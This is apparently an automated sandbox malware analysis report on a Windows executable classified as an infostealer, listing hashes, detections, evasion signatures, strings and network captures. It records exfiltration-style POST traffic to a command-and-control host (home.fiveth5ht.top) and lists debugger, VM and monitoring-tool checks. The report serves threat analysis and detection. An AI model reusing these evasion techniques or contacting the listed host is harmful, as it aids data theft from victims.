Windows Analysis Report
s8kPMNXOZY.exe

Overview

General Information

Sample name: s8kPMNXOZY.exe (renamed because original name is a hash value)
Original sample name: fbba61c61fa706eec44a022a1e9e3bac.exe
Analysis ID: 1581592
MD5: fbba61c61fa706eec44a022a1e9e3bac
SHA1: 74e5e5e2ad5dfba941f35c8e207cad219b9ad21d
SHA256: 085ebe5916195a08c768e279650cdaa09b11b8ceda0fad4b9a499a4a3267b461
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • s8kPMNXOZY.exe (PID: 8156 cmdline: "C:\Users\user\Desktop\s8kPMNXOZY.exe" MD5: FBBA61C61FA706EEC44A022A1E9E3BAC)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: s8kPMNXOZY.exe | Avira: detected
Source: s8kPMNXOZY.exe | Virustotal: Detection: 52%
Source: s8kPMNXOZY.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: s8kPMNXOZY.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: -----BEGIN PUBLIC KEY----- 0_2_0026DCF0
Source: s8kPMNXOZY.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_002AA5B0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_002AB560
Source: s8kPMNXOZY.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0024255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0024255D
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_002429FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 461736
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 143 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0030A8C0 recvfrom, 0_2_0030A8C0
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 461736
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: s8kPMNXOZY.exe, 00000000.00000003.1398993637.0000000000F73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: s8kPMNXOZY.exe, 00000000.00000003.1398924001.0000000000F04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: s8kPMNXOZY.exe, 00000000.00000003.1398627069.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000002.1406172841.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398924001.0000000000F04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: s8kPMNXOZY.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: s8kPMNXOZY.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: s8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: s8kPMNXOZY.exe | Static PE information: section name:
Source: s8kPMNXOZY.exe | Static PE information: section name: .idata
Source: s8kPMNXOZY.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002505B0 0_2_002505B0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00256FA0 0_2_00256FA0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0027F100 0_2_0027F100
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0030B180 0_2_0030B180
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005CE050 0_2_005CE050
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005CA000 0_2_005CA000
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_003100E0 0_2_003100E0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002A6210 0_2_002A6210
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0030C320 0_2_0030C320
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00310420 0_2_00310420
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00594410 0_2_00594410
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0024E620 0_2_0024E620
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0030C770 0_2_0030C770
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005A6730 0_2_005A6730
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002AA7F0 0_2_002AA7F0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005C4780 0_2_005C4780
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002FC900 0_2_002FC900
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0024A960 0_2_0024A960
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00254940 0_2_00254940
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00416AC0 0_2_00416AC0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_004FAAC0 0_2_004FAAC0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_003D4B60 0_2_003D4B60
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_004FAB2C 0_2_004FAB2C
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0024CBB0 0_2_0024CBB0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005B8BF0 0_2_005B8BF0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005CCC90 0_2_005CCC90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005C4D40 0_2_005C4D40
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00400D80 0_2_00400D80
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005BCD80 0_2_005BCD80
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0055AE30 0_2_0055AE30
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00264F70 0_2_00264F70
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0030EF90 0_2_0030EF90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00308F90 0_2_00308F90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00592F90 0_2_00592F90
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002510E6 0_2_002510E6
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005AD430 0_2_005AD430
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005B35B0 0_2_005B35B0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005D17A0 0_2_005D17A0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002F9880 0_2_002F9880
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00599920 0_2_00599920
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005C3A70 0_2_005C3A70
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005B1BD0 0_2_005B1BD0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00281BE0 0_2_00281BE0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005A7CC0 0_2_005A7CC0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_004F9C80 0_2_004F9C80
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00255DB0 0_2_00255DB0
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 002475A0 appears 659 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 00285340 appears 45 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 003F7220 appears 101 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 0041CBC0 appears 101 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 00284FD0 appears 260 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 003244A0 appears 72 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 00284F40 appears 325 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 0025CCD0 appears 55 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 0024C960 appears 36 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 002473F0 appears 113 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 002471E0 appears 47 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 0024CAA0 appears 63 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 0025CD40 appears 78 times
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: String function: 002850A0 appears 99 times
Source: s8kPMNXOZY.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: s8kPMNXOZY.exe | Static PE information: Section: njaplbck ZLIB complexity 0.9943981619190929
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0024255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0024255D
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_002429FF
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: s8kPMNXOZY.exe | Virustotal: Detection: 52%
Source: s8kPMNXOZY.exe | ReversingLabs: Detection: 63%
Source: s8kPMNXOZY.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: s8kPMNXOZY.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Section loaded: kernel.appcore.dll
Source: s8kPMNXOZY.exe | Static file information: File size 4500992 > 1048576
Source: s8kPMNXOZY.exe | Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x288a00
Source: s8kPMNXOZY.exe | Static PE information: Raw size of njaplbck is bigger than: 0x100000 < 0x1be800

Data Obfuscation

Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Unpacked PE file: 0.2.s8kPMNXOZY.exe.240000.0.unpack :EW;.rsrc:W;.idata :W; :EW;njaplbck:EW;rewyqdml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;njaplbck:EW;rewyqdml:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: s8kPMNXOZY.exe | Static PE information: real checksum: 0x457a0d should be: 0x450301
Source: s8kPMNXOZY.exe | Static PE information: section name:
Source: s8kPMNXOZY.exe | Static PE information: section name: .idata
Source: s8kPMNXOZY.exe | Static PE information: section name:
Source: s8kPMNXOZY.exe | Static PE information: section name: njaplbck
Source: s8kPMNXOZY.exe | Static PE information: section name: rewyqdml
Source: s8kPMNXOZY.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_3_00F6999D push ecx; iretd 0_3_00F699C4
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_3_00F69C83 push ecx; retf 0039h 0_3_00F69C84
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_3_00F5F860 push eax; iretd 0_3_00F5F861
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_3_00F5FC60 pushad ; iretd 0_3_00F5FC61
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_3_00F61432 push eax; ret 0_3_00F61541
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_3_00F69922 push ecx; retf 001Eh 0_3_00F69924
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002961A1 push es; retn 007Ch 0_2_002961A2
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_005C41D0 push eax; mov dword ptr [esp], edx 0_2_005C41D5
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002C2340 push eax; mov dword ptr [esp], 00000000h 0_2_002C2343
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002FC7F0 push eax; mov dword ptr [esp], 00000000h 0_2_002FC743
Source: s8kPMNXOZY.exe | Static PE information: section name: njaplbck entropy: 7.955985417488292

Boot Survival

Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: AA448C second address: AA4491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADDA41 second address: ADDA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADE442 second address: ADE44C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A96E1D second address: A96E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA127EBDEh 0x00000008 jmp 00007F6FA127EBDBh 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADEC6F second address: ADEC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE37B8 second address: AE37BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE3E65 second address: AE3E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F6FA0B89506h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE3E72 second address: AE3E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE4E92 second address: AE4E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE4E98 second address: AE4E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE4E9C second address: AE4EB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA0B8950Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE6FAF second address: AE6FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE6FB3 second address: AE6FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE6FB7 second address: AE6FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
